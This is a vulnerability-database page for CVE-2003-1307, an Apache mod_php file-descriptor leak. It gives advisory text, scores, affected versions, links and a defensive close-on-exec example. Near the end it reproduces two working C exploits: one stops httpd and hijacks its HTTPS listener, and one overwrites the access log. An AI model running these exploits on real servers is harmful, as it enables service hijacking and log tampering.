CVE-2003-1307
CVSS 4.3
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:35
NMCOE

[Original] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."


[CNNVD] Apache mod_php module local file descriptor leakage vulnerability (CNNVD-200312-435)

Apache is a popular web server.
Apache mod_php has a security issue: a local attacker can use this vulnerability to access high-privilege file descriptors, which can lead to theft or modification of sensitive information.
When mod_php is used, many file descriptors are leaked to the PHP script process; if a script page calls an external program via passthru(), exec() or system(), those descriptors are passed on to the program.
One of these descriptors is the listening descriptor for port 443, i.e. https. Port 443 is a privileged port, normally bound by a root process. This descriptor is opened by Apache regardless of whether https is actually in use.
The root cause of this vulnerability is that fcntl() is not called with the CLOEXEC flag to prevent privileged file descriptors from leaking. By exploiting this issue, an attacker may steal or modify sensitive information on the Apache server side through these descriptors.
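The missing close-on-exec handling described above, shown from the defender's side as an added example (not code from the advisory, Apache or PHP): a helper that marks a descriptor FD_CLOEXEC, a check that reads the flag back, and an audit routine that counts which descriptors would survive an exec() and flags listening sockets. The socket in main() is a constructed, unprivileged loopback stand-in for Apache's port 443 listener.

```c
#include <arpa/inet.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* Mark fd close-on-exec: fork() keeps it, exec() closes it, so spawned children never inherit it. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags == -1 ? -1 : fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* 1 if fd is close-on-exec, 0 if it would leak across exec(), -1 if fd is not open. */
int has_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags == -1 ? -1 : (flags & FD_CLOEXEC) != 0;
}

/* Audit: count descriptors in (above, limit) that would survive an exec(); a listening
 * socket, the advisory's case, is reported on stderr. Run it from a spawned child. */
int count_exec_inheritable(int above, int limit)
{
    int leaked = 0;
    for (int fd = above + 1; fd < limit; fd++) {
        int accepting = 0;
        socklen_t len = sizeof accepting;
        if (has_cloexec(fd) != 0) continue;   /* closed, or safely marked */
        leaked++;
        if (getsockopt(fd, SOL_SOCKET, SO_ACCEPTCONN, &accepting, &len) == 0 && accepting)
            fprintf(stderr, "fd %d: listening socket inheritable across exec\n", fd);
    }
    return leaked;
}

int main(void)
{
    /* Constructed stand-in for Apache's listener: unprivileged, loopback, any free port. */
    struct sockaddr_in a = { .sin_family = AF_INET, .sin_addr.s_addr = htonl(INADDR_LOOPBACK) };
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0 || bind(s, (struct sockaddr *)&a, sizeof a) < 0 || listen(s, 1) < 0)
        return 1;
    printf("inheritable before fix: %d\n", count_exec_inheritable(2, s + 1));
    set_cloexec(s);                     /* the fcntl() call the advisory says is missing */
    printf("inheritable after fix:  %d\n", count_exec_inheritable(2, s + 1));
    close(s);
    return 0;
}
```

On Linux the same result can be had with no race window by passing SOCK_CLOEXEC to socket() at creation time instead of calling fcntl() afterwards.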

- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:apache:http_server:2.0.46::win32
cpe:/a:apache:http_server:2.0.47 - Apache Software Foundation Apache HTTP Server 2.0.47
cpe:/a:apache:http_server:2.0.28 - Apache Software Foundation Apache HTTP Server 2.0.28
cpe:/a:apache:http_server:2.0.48 - Apache Software Foundation Apache HTTP Server 2.0.48
cpe:/a:apache:http_server:2.0.41 - Apache Software Foundation Apache HTTP Server 2.0.41
cpe:/a:apache:http_server:2.0.36 - Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:2.0.40 - Apache Software Foundation Apache HTTP Server 2.0.40
cpe:/a:apache:http_server:2.0.42 - Apache Software Foundation Apache HTTP Server 2.0.42
cpe:/a:apache:http_server:2.0.28:beta - Apache Software Foundation Apache HTTP Server 2.0.28 Beta
cpe:/a:apache:http_server:2.0.37 - Apache Software Foundation Apache HTTP Server 2.0.37
cpe:/a:apache:http_server:2.0.35 - Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:2.0.45 - Apache Software Foundation Apache HTTP Server 2.0.45
cpe:/a:apache:http_server:2.0.32:beta:win32
cpe:/a:apache:http_server:2.0.43 - Apache Software Foundation Apache HTTP Server 2.0.43
cpe:/a:apache:http_server:2.0.39 - Apache Software Foundation Apache HTTP Server 2.0.39
cpe:/a:apache:http_server:2.0.44 - Apache Software Foundation Apache HTTP Server 2.0.44
cpe:/a:apache:http_server:2.0.46 - Apache Software Foundation Apache HTTP Server 2.0.46
cpe:/a:apache:http_server:2.0.32 - Apache Software Foundation Apache HTTP Server 2.0.32
cpe:/a:apache:http_server:2.0.28:beta:win32
cpe:/a:apache:http_server:2.0 - Apache Software Foundation Apache HTTP Server 2.0
cpe:/a:apache:http_server:2.0.9 - Apache Software Foundation Apache HTTP Server 2.0.9a
cpe:/a:apache:http_server:2.0.34:beta:win32
cpe:/a:apache:http_server:2.0.38 - Apache Software Foundation Apache HTTP Server 2.0.38

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1307
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1307
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-435
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/9302
(UNKNOWN)  BID  9302
http://www.securityfocus.com/archive/1/archive/1/449298/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20061020 Re: PHP "exec", "system", "popen" (+small POC)
http://www.securityfocus.com/archive/1/archive/1/449234/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20061019 PHP "exec", "system", "popen" problem
http://www.securityfocus.com/archive/1/348368
(VENDOR_ADVISORY)  BUGTRAQ  20031226 Hijacking Apache https by mod_php
http://hackerdom.ru/~dimmo/phpexpl.c
(UNKNOWN)  MISC  http://hackerdom.ru/~dimmo/phpexpl.c
http://bugs.php.net/38915
(UNKNOWN)  MISC  http://bugs.php.net/38915

- Vulnerability information

Apache mod_php module local file descriptor leakage vulnerability
Medium severity  Access validation error
2003-12-31 00:00:00 2006-10-24 00:00:00
Local

- Advisories and patches

Vendor patches:
PHP
---
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:

http://www.php.net

- Vulnerability information (23481)

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1) (EDBID:23481)
linux local
2003-12-26 Verified
0 Steve Grubb
N/A [Download]
source: http://www.securityfocus.com/bid/9302/info

Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/*
 * The basic actions are like this:
 *      1) Become session leader
 *      2) Get rid of the parent (apache)
 *      3) Start handling requests
 */

#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF  "/var/www/html/foo-cert.pem"

static SSL_CTX    *ctx;
static SSL        *ssl;
static X509       *client_cert;
static const SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    /* Need to fork so apache doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();
        sleep(2);

        /* just in case one was a controlling tty */
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    else
    {
        sleep(1);
        system("/usr/sbin/httpd -k stop");
        sleep(1);
    }
    return 0;
}

static void server_loop(int descr)
{
    struct timeval   tv;
    fd_set read_mask ;

    FD_ZERO(&read_mask);
    FD_SET(descr, &read_mask);
    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
            continue;
        fd = accept(descr, (struct sockaddr *)&remote, &len);
        if (fd >=0) {
            char obuf[1024];
            if ((ssl = SSL_new (ctx)) != NULL) {
                SSL_set_fd (ssl, fd);
                SSL_set_accept_state(ssl);
                if ((SSL_accept (ssl)) == -1)
                        exit(1);

                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 40\n");
                strcat(obuf, "Content-Type: text/html\n\n");
                strcat(obuf, "<html><body>You're owned!</body></html>");
                SSL_write (ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl,
                        SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
                SSL_free (ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free (ctx);  /* Never gets called */
}

static void ssl_init(void)
{
        SSL_load_error_strings();
        SSLeay_add_ssl_algorithms();
        meth = SSLv23_server_method();
        ctx = SSL_CTX_new (meth);
        if (!ctx)
                exit(1);
        if (SSL_CTX_use_certificate_file(ctx, CERTF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (!SSL_CTX_check_private_key(ctx))
                exit(1);
}


- Vulnerability information (23482)

Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2) (EDBID:23482)
linux local
2003-12-26 Verified
0 frauk\x41ser
N/A [Download]
source: http://www.securityfocus.com/bid/9302/info
 
Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information.

/*
 * apache's access_log can be overwritten with arbitrary content
 * from PHP called executables.
 * POC by frauk\x41ser && sk0L / SEC Consult 2006
 */

#include <unistd.h>
#include <fcntl.h>

#define LOGFD 7

int main(void)
{
        fcntl(LOGFD, F_SETFL, O_WRONLY); /* change mode from append to write */
        lseek(LOGFD, 0, SEEK_SET);       /* reposition to start of file */
        write(LOGFD, "hehe\n", 5);
        return 0;
}


- Vulnerability information

3215
mod_php for Apache HTTP Server File Descriptor Leakage
Vendor Verified

- Vulnerability description

Apache mod_php contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker makes an SSL connection to the Apache server with permissions to execute file uploads, which will disclose file descriptor information resulting in possible hijacking of the HTTP service.

- Timeline

2003-12-26 2003-12-26
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

Unknown or Incomplete